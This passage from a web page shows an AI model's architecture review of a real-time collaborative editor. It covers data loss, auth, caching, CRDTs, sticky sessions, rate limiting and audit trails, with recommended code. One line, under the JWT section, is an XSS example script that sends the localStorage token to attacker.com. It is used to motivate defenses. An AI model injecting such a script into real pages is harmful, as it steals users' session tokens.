T25: Server restarts, loads last snapshot
Result: " World" is lost

Risk Calculation:

Assume 1% server crash rate per day per server
100 servers = 1 crash per day
Average 15 seconds of data loss per crash
1000 concurrent users = ~250 users lose work daily

Solutions:

Solution	Trade-offs
Write-ahead log (WAL) for every change	+No data loss, -Disk I/O overhead, -Slower writes
Reduce snapshot interval to 5s	+Less data loss window, -6x more snapshots, -DB load increases
Event sourcing: store changes, not snapshots	+Perfect audit trail, -Requires replay on load, -Slower cold starts
Redis persistence (AOF)	+Fast, +Durable, -Adds Redis complexity

Recommended: Event sourcing with periodic snapshots:

// Store individual changes, not snapshots
async function saveChange(docId, change, version) {
  await db.query(
    `INSERT INTO changes (doc_id, change_data, version, created_at) 
     VALUES ($1, $2, $3, NOW())`,
    [docId, JSON.stringify(change), version]
  );
  
  // Create snapshot every 100 changes
  const changeCount = await db.query(
    `SELECT COUNT(*) FROM changes WHERE doc_id = $1`,
    [docId]
  );
  
  if (changeCount.rows[0].count % 100 === 0) {
    await createSnapshot(docId);
  }
}

// Load document efficiently
async function loadDocument(docId) {
  // Get latest snapshot
  const snapshot = await db.query(
    `SELECT content, version FROM snapshots 
     WHERE doc_id = $1 
     ORDER BY version DESC LIMIT 1`,
    [docId]
  );
  
  // Replay changes since snapshot
  const changes = await db.query(
    `SELECT change_data, version FROM changes 
     WHERE doc_id = $1 AND version > $2 
     ORDER BY version`,
    [docId, snapshot.rows[0]?.version || 0]
  );
  
  // Reconstruct document
  let doc = snapshot.rows[0]?.content || {};
  changes.rows.forEach(row => {
    doc = applyChange(doc, JSON.parse(row.change_data));
  });
  
  return doc;
}

6. JWT Tokens in localStorage + 5-Minute API Cache = Authorization Bypass

Problem: Multiple authorization vulnerabilities.

Issue 1: localStorage is XSS-vulnerable

// Attacker injects script via malicious document content
<script>
  fetch('https://attacker.com?token=' + localStorage.getItem('jwt'));
</script>

Issue 2: 5-minute API cache with stale auth

T0: User logs in, gets JWT (valid)
T1: Admin revokes user's access in database
T2: User makes request (still cached, bypasses auth check)
T3: Request succeeds with revoked permissions

Issue 3: 24-hour token expiry is too long

Stolen token can be used for 24 hours
Revocation takes 24 hours to take effect

Solutions:

Solution	Trade-offs
httpOnly cookies + CSRF tokens	+Immune to XSS for token theft, -Requires CSRF protection, -Slightly more complex
Short-lived tokens (15 min) + refresh tokens	+Reduces window of compromise, -More refresh requests, -Requires refresh token storage
Remove API caching for auth-required endpoints	+Always enforces current permissions, -Increases load, -Reduces performance
Token revocation list (Redis)	+Instant revocation, -Redis lookup per request, -Cache invalidation complexity

Recommended: httpOnly cookies + short-lived tokens + Redis revocation:

// Auth middleware
async function authMiddleware(req, res, next) {
  const token = req.cookies.jwt; // httpOnly cookie
  
  if (!token) return res.status(401).json({ error: 'Unauthorized' });
  
  try {
    const decoded = jwt.verify(token, SECRET, { 
      algorithms: ['HS256'],
      issuer: 'https://yourdomain.com',
      audience: 'api'
    });
    
    // Check revocation list
    const isRevoked = await redis.get(`revoked:${decoded.jti}`);
    if (isRevoked) {
      return res.status(401).json({ error: 'Token revoked' });
    }
    
    req.user = decoded;
    next();
  } catch (err) {
    return res.status(401).json({ error: 'Invalid token' });
  }
}

// Login endpoint
app.post('/login', async (req, res) => {
  const user = await authenticateUser(req.body);
  
  const token = jwt.sign(
    { 
      sub: user.id, 
      jti: crypto.randomUUID() // Unique token ID for revocation
    },
    SECRET,
    { 
      expiresIn: '15m',  // Short expiry
      issuer: 'https://yourdomain.com',
      audience: 'api'
    }
  );
  
  const refreshToken = jwt.sign(
    { sub: user.id },
    REFRESH_SECRET,
    { expiresIn: '7d' }
  );
  
  res.cookie('jwt', token, {
    httpOnly: true,
    secure: true,
    sameSite: 'strict',
    maxAge: 15 * 60 * 1000
  });
  
  res.cookie('refreshToken', refreshToken, {
    httpOnly: true,
    secure: true,
    sameSite: 'strict',
    maxAge: 7 * 24 * 60 * 60 * 1000
  });
  
  res.json({ success: true });
});

// Logout endpoint
app.post('/logout', async (req, res) => {
  const token = req.cookies.jwt;
  const decoded = jwt.decode(token);
  
  // Revoke token immediately
  await redis.setex(`revoked:${decoded.jti}`, 15 * 60, '1');
  
  res.clearCookie('jwt');
  res.clearCookie('refreshToken');
  res.json({ success: true });
});

// Refresh token endpoint
app.post('/refresh', (req, res) => {
  const refreshToken = req.cookies.refreshToken;
  
  try {
    const decoded = jwt.verify(refreshToken, REFRESH_SECRET);
    
    const newToken = jwt.sign(
      { sub: decoded.sub, jti: crypto.randomUUID() },
      SECRET,
      { expiresIn: '15m' }
    );
    
    res.cookie('jwt', newToken, {
      httpOnly: true,
      secure: true,
      sameSite: 'strict',
      maxAge: 15 * 60 * 1000
    });
    
    res.json({ success: true });
  } catch (err) {
    res.status(401).json({ error: 'Invalid refresh token' });
  }
});

7. CloudFront 5-Minute Cache on Dynamic API Responses

Problem: Caching API responses breaks real-time collaboration.

Scenario:

T0: User A requests document state → Server returns "Hello"
T1: User B edits document to "Hello World"
T2: User A refreshes page within 5 minutes
T3: CloudFront returns cached "Hello" (stale data)
T4: User A continues editing from stale state
T5: Conflict when both edits merge

Solutions:

Solution	Trade-offs
Remove API caching entirely (Cache-Control: no-cache)	+Always fresh, -Increases origin load, -Slower for read-heavy workloads
Separate CDN for static assets only	+Caches CSS/JS, -Doesn't cache API, -More complex routing
Cache API by document version	+Can cache longer, -Invalidation complexity, -Requires version headers
Use Cache-Control: private, max-age=0	+Browser still caches, -CDN doesn't cache, -Minimal benefit

Recommended: Separate CDN tiers:

// Static assets (cacheable)
app.use(express.static('public', {
  setHeaders: (res, path) => {
    if (path.endsWith('.js') || path.endsWith('.css')) {
      res.setHeader('Cache-Control', 'public, max-age=31536000, immutable');
      // Include hash in filename for cache busting
    }
  }
}));

// API endpoints (not cacheable)
app.get('/api/documents/:docId', (req, res) => {
  res.setHeader('Cache-Control', 'no-cache, no-store, must-revalidate');
  res.setHeader('Pragma', 'no-cache');
  res.setHeader('Expires', '0');
  
  // Return document
});

// CloudFront configuration
// - Whitelist only static asset paths for caching
// - API paths bypass cache entirely
// - Use separate behaviors for different path patterns

🟠 MAJOR ISSUES

8. No Operational Transformation / Conflict Resolution for Overlapping Edits

Problem: Current LWW is too naive for real-time collaboration.

Document: "abcdef"

User A: Delete "c" (index 2)  → "abdef"
User B: Insert "X" at index 3 → "abcXdef"

What should happen?
- If A deletes first: "abXdef" (B's insertion shifts)
- If B inserts first: "abdXef" (A deletes from new position)

LWW just picks one completely, losing the other edit

Solutions:

Solution	Trade-offs
Implement OT (Operational Transform)	+Battle-tested (Google Docs), +Handles overlapping edits, -Complex (200+ LOC minimum), -Difficult to debug
Use CRDT library (Yjs/Automerge)	+Automatic merging, +Offline support, +Simpler than OT, -Larger message sizes, -Memory overhead
Pessimistic locking	+Prevents conflicts, -Reduces concurrency, -Poor UX (users wait for locks)

Recommended: Yjs (already mentioned in #3, but critical enough to restate):

// With Yjs, this just works
const ydoc = new Y.Doc();
const ytext = ydoc.getText('content');

// User A
ytext.delete(2, 1);  // Delete "c"

// User B (concurrent)
ytext.insert(3, 'X');  // Insert "X"

// Result: "abXdef" (deterministic, both edits preserved)

9. No Presence/Awareness Features

Problem: Users don't know who else is editing or where.

Risks:

Two users unknowingly edit the same section (creates conflicts)
Users don't see cursor positions (confusing experience)
No indication of who made which change

Solutions:

Solution	Trade-offs
Cursor presence via WebSocket	+Real-time, +Low latency, -Requires tracking per connection
Activity log in sidebar	+Shows recent edits, -Not real-time, -Requires polling
Collaborative cursors library	+Battle-tested, +Integrates with CRDT, -Adds dependencies

Recommended: Yjs with y-protocols for awareness:

import * as Y from 'yjs';
import * as awarenessProtocol from 'y-protocols/awareness';

const ydoc = new Y.Doc();
const awareness = ydoc.awareness;

// Broadcast local state
awareness.setLocalState({
  user: {
    name: currentUser.name,
    color: currentUser.color,
    clientID: ydoc.clientID
  },
  cursor: {
    anchor: 0,
    head: 5
  }
});

// Listen for remote changes
awareness.on('change', changes => {
  changes.forEach(clientID => {
    const state = awareness.getStates().get(clientID);
    if (state) {
      renderRemoteCursor(clientID, state.cursor);
    }
  });
});

10. No Offline Support

Problem: Users lose connection → edits are lost.

Solutions:

Solution	Trade-offs
Local storage queue + retry	+Simple, -Manual sync logic, -Data loss on browser crash
Service Worker + IndexedDB	+Works offline, +Syncs on reconnect, -Browser storage limits, -Complexity
CRDT with local persistence	+Automatic sync, +Works offline, +Yjs has built-in support, -Larger payload

Recommended: Yjs with IndexedDB persistence:

import * as Y from 'yjs';
import { IndexeddbPersistence } from 'y-indexeddb';

const ydoc = new Y.Doc();
const persistence = new IndexeddbPersistence('document-id', ydoc);

persistence.whenSynced.then(() => {
  console.log('Loaded from IndexedDB');
});

// Works offline: edits stored in IndexedDB
ytext.insert(0, 'offline edit');

// On reconnect: automatically syncs via WebSocket

11. Load Balancer Round-Robin Doesn't Ensure Sticky Sessions

Problem: User reconnects → routed to different server → loses WebSocket state.

Scenario:

Request 1: User A → Load Balancer → Server 1 (WebSocket connected)
Request 2: User A → Load Balancer → Server 2 (no WebSocket state)
Result: User A's edits don't broadcast to their own clients

Solutions:

Solution	Trade-offs
Sticky sessions (IP hash or cookie)	+Keeps user on same server, -Uneven load distribution, -Server failures lose connections
Shared session store (Redis)	+Load balancer can distribute freely, +Server failures don't lose state, -Redis lookup per request
WebSocket gateway (e.g., Socket.io)	+Handles reconnection, +Automatic load balancing, -Additional latency

Recommended: Sticky sessions + Redis fallback:

// Nginx config
upstream api_servers {
  ip_hash;  // Route based on client IP
  server api1.internal:3000;
  server api2.internal:3000;
  server api3.internal:3000;
}

// Node.js: Store WebSocket metadata in Redis
const wsClients = new Map(); // Local cache

io.on('connection', (socket) => {
  const userId = socket.handshake.auth.userId;
  const serverId = process.env.SERVER_ID;
  
  // Track locally
  wsClients.set(userId, socket);
  
  // Also store in Redis for failover
  await redis.setex(
    `ws:${userId}`,
    3600,
    JSON.stringify({ serverId, socketId: socket.id })
  );
  
  socket.on('disconnect', () => {
    wsClients.delete(userId);
    await redis.del(`ws:${userId}`);
  });
});

// Broadcast to user (works across servers)
async function broadcastToUser(userId, message) {
  // Try local first
  const localSocket = wsClients.get(userId);
  if (localSocket) {
    localSocket.emit('update', message);
    return;
  }
  
  // Check Redis for user's server
  const wsInfo = await redis.get(`ws:${userId}`);
  if (wsInfo) {
    const { serverId } = JSON.parse(wsInfo);
    // Publish to that server's Redis channel
    await redis.publish(`user:${userId}:${serverId}`, JSON.stringify(message));
  }
}

12. No Rate Limiting

Problem: Malicious user can spam edits → DoS.

Attacker: Send 1000 edits/second
Result: Database overloaded, all users experience lag

Solutions:

Solution	Trade-offs
Token bucket per user	+Fair, +Configurable, -Requires tracking per user
Redis rate limiter	+Fast, +Distributed, -Redis lookup per request
Adaptive rate limiting	+Responds to load, -More complex

Recommended: Redis token bucket:

async function checkRateLimit(userId, docId) {
  const key = `ratelimit:${userId}:${docId}`;
  const limit = 100; // 100 edits per minute
  const window = 60;
  
  const current = await redis.incr(key);
  if (current === 1) {
    await redis.expire(key, window);
  }
  
  if (current > limit) {
    throw new Error('Rate limit exceeded');
  }
}

// Use in edit handler
io.on('connection', (socket) => {
  socket.on('edit', async (data) => {
    try {
      await checkRateLimit(socket.userId, data.docId);
      await handleEdit(data);
    } catch (err) {
      socket.emit('error', { message: 'Rate limit exceeded' });
    }
  });
});

13. No Audit Trail

Problem: Can't answer "who changed what when" or recover from mistakes.

Solutions:

Solution	Trade-offs
Store all changes in audit table	+Complete history, +Can restore any version, -Storage overhead
Event sourcing	+Audit trail is primary source, +Can replay, -Architectural change
Immutable log (Kafka)	+Durable, +Scalable, -Operational complexity

Recommended: Audit table (simple):

async function saveChange(docId, change, userId) {
  const changeId = crypto.randomUUID();
  
  await db.query(
    `INSERT INTO document_changes 
     (id, doc_id, user_id, change_data, created_at) 
     VALUES ($1, $2, $3, $4, NOW())`,
    [changeId, docId, userId, JSON.stringify(change)]
  );
  
  return changeId;
}

// Query audit trail
async function getHistory(docId, limit = 100) {
  return db.query(
    `SELECT id, user_id, change_data, created_at 
     FROM document_changes 
     WHERE doc_id = $1 
     ORDER BY created_at DESC 
     LIMIT $2`,
    [docId, limit]
  );
}

// Restore to specific point
async function restoreToVersion(docId, changeId) {
  const changes = await db.query(
    `SELECT change_data FROM document_changes 
     WHERE doc_id = $1 AND created_at <= 
       (SELECT created_at FROM document_changes WHERE id = $2)
     ORDER BY created_at`,
    [docId, changeId]
  );
  
  let doc = {};
  changes.rows.forEach(row => {
    doc = applyChange(doc, JSON.parse(row.change_data));
  });
  
  return doc;
}

🟡 MODERATE ISSUES

14. No Concurrency Control for Document Metadata

Problem: What if two users rename the same document simultaneously?

Solutions:

Use optimistic locking with version numbers
Serialize metadata updates through single queue

15. Database Read Replicas May Lag

Problem: User reads stale data from replica.

Solutions:

Use read-after-write consistency
Route critical reads to primary
Use PostgreSQL logical replication (lower latency)

16. No Disaster Recovery Plan

Problem: Database corruption → all documents lost.

Solutions:

Daily backups to S3
Point-in-time recovery (PostgreSQL WAL archiving)
Regular restore drills

Summary Table

Issue	Severity	Root Cause	Recommended Fix	Effort
Split-brain sync	CRITICAL	No inter-server messaging	Redis Pub/Sub	Medium
Client clock skew	CRITICAL	Client-side timestamps	Server sequence numbers	Low
LWW data loss	CRITICAL	Naive conflict resolution	CRDT (Yjs)	High
Polling scalability	CRITICAL	50k QPS polling	Redis Pub/Sub	Medium
Snapshot data loss	CRITICAL	30s window	Event sourcing	Medium
Auth bypass	CRITICAL	localStorage + cache	httpOnly + short-lived tokens	Medium
API caching	CRITICAL	CloudFront on dynamic data	Separate static/API CDN	Low
No OT/CRDT	MAJOR	Naive conflict resolution	Yjs library	High
No offline support	MAJOR	Missing persistence	IndexedDB + Yjs	Medium
Sticky sessions	MAJOR	Round-robin LB	IP hash + Redis	Low
No rate limiting	MAJOR	Missing limits	Redis token bucket	Low
No audit trail	MAJOR	Missing logging	Audit table	Low

The architecture needs a complete overhaul of the sync/conflict resolution layer. Start with Redis Pub/Sub + Yjs CRDT, then address auth and persistence.

Debug This Architecture

Turn this model response into notes, narration, or a short video

Auto Notes Transcript Narrate Video Cut

Partner link

This output is part of our open dataset — 5K+ AI responses across 200 models

About Claude Haiku 4.5

Capabilities

ConversationReasoningCode GenerationAnalysisTool Use

Specifications

Provider: Anthropic
Released: 2025-10-15
Size: LARGE
Context: 200,000 tokens

Keep exploring

SAME PROMPT

Claude Sonnet 4.6's version

Same prompt, different result

COMPARE

Claude Haiku 4.5 vs Gemini 3.1 Pro Preview

Both outputs, side by side

Debug This Architecture

?Prompt

Response

Critical Analysis: Real-Time Collaborative Editor Architecture

🔴 CRITICAL ISSUES

1. Split-Brain Synchronization Between Servers

2. Client Clock Skew Destroys Conflict Resolution

3. Last-Write-Wins Loses Content

4. Polling Every 2 Seconds Doesn't Scale

5. 30-Second Snapshot Interval Creates Data Loss Window

6. JWT Tokens in localStorage + 5-Minute API Cache = Authorization Bypass

7. CloudFront 5-Minute Cache on Dynamic API Responses

🟠 MAJOR ISSUES

8. No Operational Transformation / Conflict Resolution for Overlapping Edits

9. No Presence/Awareness Features

10. No Offline Support

11. Load Balancer Round-Robin Doesn't Ensure Sticky Sessions

12. No Rate Limiting

13. No Audit Trail

🟡 MODERATE ISSUES

14. No Concurrency Control for Document Metadata

15. Database Read Replicas May Lag

16. No Disaster Recovery Plan

Summary Table

About Claude Haiku 4.5

Capabilities

Categories

Specifications

Claude Sonnet 4.6's version

Claude Haiku 4.5 vs Gemini 3.1 Pro Preview

Debug This Architecture

?Prompt

Response

Critical Analysis: Real-Time Collaborative Editor Architecture

🔴 CRITICAL ISSUES

1. Split-Brain Synchronization Between Servers

2. Client Clock Skew Destroys Conflict Resolution

3. Last-Write-Wins Loses Content

4. Polling Every 2 Seconds Doesn't Scale

5. 30-Second Snapshot Interval Creates Data Loss Window

6. JWT Tokens in localStorage + 5-Minute API Cache = Authorization Bypass

7. CloudFront 5-Minute Cache on Dynamic API Responses

🟠 MAJOR ISSUES

8. No Operational Transformation / Conflict Resolution for Overlapping Edits

9. No Presence/Awareness Features

10. No Offline Support

11. Load Balancer Round-Robin Doesn't Ensure Sticky Sessions

12. No Rate Limiting

13. No Audit Trail

🟡 MODERATE ISSUES

14. No Concurrency Control for Document Metadata

15. Database Read Replicas May Lag

16. No Disaster Recovery Plan

Summary Table

About Claude Haiku 4.5

Capabilities

Categories

Specifications

Claude Sonnet 4.6's version

Claude Haiku 4.5 vs Gemini 3.1 Pro Preview

?
Prompt

?
Prompt